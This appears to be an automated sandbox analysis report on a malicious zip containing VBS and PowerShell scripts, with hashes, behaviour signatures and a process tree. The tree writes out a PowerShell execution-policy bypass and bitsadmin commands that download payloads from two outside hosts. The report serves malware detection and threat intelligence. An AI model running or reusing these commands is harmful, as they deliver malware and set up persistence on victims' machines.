Overview

overview

10

Static

static

1

ckJTQEOKC.zip

windows11-21h2-x64

10

Analysis

  • max time kernel
    326s
  • max time network
    332s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-it
  • resource tags

    arch:x64arch:x86image:win11-20241007-itlocale:it-itos:windows11-21h2-x64systemwindows
  • submitted
    29-11-2024 11:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ckJTQEOKC.zip

  • Size

    20KB

  • MD5

    a8fd65d74a9739b23c7e364df251b4e5

  • SHA1

    fe8d2606f65a2cf08213786576ecfb20e4e6eba3

  • SHA256

    32f821e84b91cdd2e998be739eb5b9d2e435827b4be84c54be34ce44a6e2ec31

  • SHA512

    27632f81f83491ca628b0210a9eb28bbbda30a718596eb8e216417f8467e971d9bdc6ede3af7163ea5524fc780722b5e1d3eb6fa4eb69c9284789b7d13727ac4

  • SSDEEP

    384:CuInQrtM9vrxKnB4AvyszfOiSr+p51d74AwsN3V/oQkUYP4ZqkqTZNLFzNF:ung8jEOAtOtw5v8ATJVFny4zqTZtFzP

Score
10/10
dropperexecution

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Download via BitsAdmin 1 TTPs 2 IoCs
    dropper
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops file in System32 directory 1 IoCs
  • Modifies registry class 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC.zip"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4064
  • C:\Windows\system32\BackgroundTransferHost.exe
    "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
    1⤵
    • Modifies registry class
    PID:4104
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1292
    • C:\Windows\system32\OpenWith.exe
      C:\Windows\system32\OpenWith.exe -Embedding
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:2664
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.vbs"
      1⤵
        PID:876
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.vbs"
        1⤵
          PID:3480
        • C:\Windows\system32\OpenWith.exe
          C:\Windows\system32\OpenWith.exe -Embedding
          1⤵
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:2904
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.ps1'"
          1⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2628
          • C:\Windows\system32\getmac.exe
            "C:\Windows\system32\getmac.exe" /fo table
            2⤵
              PID:2064
            • C:\Windows\system32\bitsadmin.exe
              "C:\Windows\system32\bitsadmin.exe" /reset
              2⤵
                PID:4120
            • C:\Windows\system32\bitsadmin.exe
              bitsadmin /transfer AlLWrT /priority FOREGROUND "https://ghryj.eu/post//213b167960f52c6124c47a5e792c6af8.html" C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\0_svchost.log
              1⤵
              • Process spawned unexpected child process
              • Download via BitsAdmin
              PID:1692
            • C:\Windows\system32\bitsadmin.exe
              bitsadmin /transfer ArwCOW /priority FOREGROUND "https://uhfb.eu/post//213b167960f52c6124c47a5e792c6af8.html" C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\1_svchost.log
              1⤵
              • Process spawned unexpected child process
              • Download via BitsAdmin
              PID:416
            • C:\Windows\system32\BackgroundTransferHost.exe
              "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
              1⤵
              • Modifies registry class
              PID:2000
            • C:\Windows\system32\mmc.exe
              "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
              1⤵
              • Drops file in System32 directory
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1952
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe"
              1⤵
                PID:3260

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\ce6e736f-bdeb-46da-947e-944ec8a31ac4.down_data
                Filesize

                121KB

                MD5

                c2c241c1111d82bf82a4b92f3313d801

                SHA1

                f822956f60c463000e5aaaeccf8b99f551179250

                SHA256

                2081dc0f876ba518493f98bc18988ebe6cc6c23d9d963b5c4bb5c9ecef1f9f29

                SHA512

                04f745fa497c8115bb76b42bac6e03b7a0edd394f1c4a62f329015c545bba1bc9b517b7941806bcd23e84bcd289316649c1cbd9c6804cc83dce62dc26655cd7f

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4e5dohp2.b3g.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\0_msedge.log
                Filesize

                32B

                MD5

                fb2d4b4538f231805a677bf1fdae7618

                SHA1

                9af3e31cad8f69e7d61f81005f8d7bb615ceea05

                SHA256

                07bd6fa0bfb02d25cb31d8d9bb31653912671394c0fb1e8b10296682448627f2

                SHA512

                d2fecf45f070e5cd752afdc6b229ffe6027ee12c726e98cc867ceb19990f964cd084de24312530c9d65a9b7ad7ad51d3d9a82c444d56a5a8cb78d65a636b6f05

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\1_msedge.log
                Filesize

                32B

                MD5

                c5f79e50e9f1426aed3a210a3a5e8c4d

                SHA1

                7c8dfd39f669d241205219f066a022e028749d8e

                SHA256

                89e9165ac6d056ca646a831e17d0c0f8877a7ebc9adba1665be6a6b60d9636aa

                SHA512

                20ac36e6a588077a038c894ebc0bd53966210b94706674e8ebc5e852463123c7f6a1255769949c29e70e4c75d179af3dfc77501cd5c7c3d6fbf0d92453074d41

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.ps1
                Filesize

                2KB

                MD5

                9d6d8a084805bbf5d22507780d14e8f4

                SHA1

                27ebc6c5948855d6b5a7f1c5422a3be6a4a1e77a

                SHA256

                9092a282a5c56c0a19713fd3067b528efae5b27e9faa737c87a9bbf6a566cc5e

                SHA512

                a8142d16469fb415ad3f9212d52f0aadde797876e7735f3faebd79b57acd04688726e83047c808851ea9394b14dca0dad8c33a1e7695c4ce2a768d46a2f3597b

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.vbs
                Filesize

                874B

                MD5

                c63ba33fb5afa2b84f98355c5acaea1c

                SHA1

                3ae2b38ea5a41352c11f70f676d78ad8b129101a

                SHA256

                de0f8fb2de75f6ed3645ed8b36bf947ccbbe834adfcc4eff7740ec5f857a18b8

                SHA512

                e0d63e8d562086c8a04273dfd7c969a70d796ef412f282b61c6320c404e58bfa213a84b56e6f4af56daae83bdfc680c00d537a6a7ead16132cb7dfbfcbeb7a13

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\darm.chh
                Filesize

                1KB

                MD5

                6b831ce8380c693ee6070ad424c9f92b

                SHA1

                b87e2ef196383c246b996c4764e328d523b5c5b7

                SHA256

                a65d23c0df6c750741bb63dee3564ea44462a07050f54a3b585d2c0c4b943e35

                SHA512

                d333149446bd5e83310037b293b1cd73d3a2a15fa9b10ccbcda5fcac70b67e53e86aea4b7c7e0f567106ba3ca45c9856ccc69db7fd75b2d272397e92abf503e4

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\lite.chh
                Filesize

                95KB

                MD5

                960716f6d0c819d551f68b970faff1f9

                SHA1

                f23ca0bafec43bd8ba899190d290ab9db97b7b07

                SHA256

                a83be5df3bb0b2b83a3727b50d0ebd74b8d0ef425a29f1352095260e12569192

                SHA512

                50fc39e4a1d3cb91ebc76dfe1eaf5f32fb4871957d57d67c0bbde29dd0f97412f945db442a4f95b3b7f69f1148fe68df7f76621493ad64f742052b333fbe5f25

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\msedge.log
                Filesize

                16B

                MD5

                49fa9b3510c1cbf6d6df2f4a2f9f8e65

                SHA1

                3c1c22697e4370100ef87a52084d7c14fbf657d3

                SHA256

                fcbccd7b328d9270a0f3820ecf622f6e14c09df6061f2275cb9524673b681acf

                SHA512

                8870d64fb90035f6a8735c1bc8452ef516fd26de8472bdd4fc2e8d23a1a4b65566e954b1e3711a460ece543325389a487fdfc5ac477af8617b658e930ffd721f

                Download Submit

              • memory/1952-46-0x000000001D410000-0x000000001D432000-memory.dmp

                Filesize

                136KB

                Download

              • memory/1952-45-0x000000001D530000-0x000000001D6B0000-memory.dmp

                Filesize

                1.5MB

                Download

              • memory/1952-44-0x0000000003470000-0x000000000347C000-memory.dmp

                Filesize

                48KB

                Download

              • memory/2628-27-0x00000233D5680000-0x00000233D5690000-memory.dmp

                Filesize

                64KB

                Download

              • memory/2628-35-0x00000233D62C0000-0x00000233D67E8000-memory.dmp

                Filesize

                5.2MB

                Download

              • memory/2628-29-0x00000233D5780000-0x00000233D578A000-memory.dmp

                Filesize

                40KB

                Download

              • memory/2628-28-0x00000233D5AF0000-0x00000233D5BF2000-memory.dmp

                Filesize

                1.0MB

                Download

              • memory/2628-17-0x00000233D56E0000-0x00000233D5762000-memory.dmp

                Filesize

                520KB

                Download

              • memory/2628-18-0x00000233D5690000-0x00000233D56B2000-memory.dmp

                Filesize

                136KB

                Download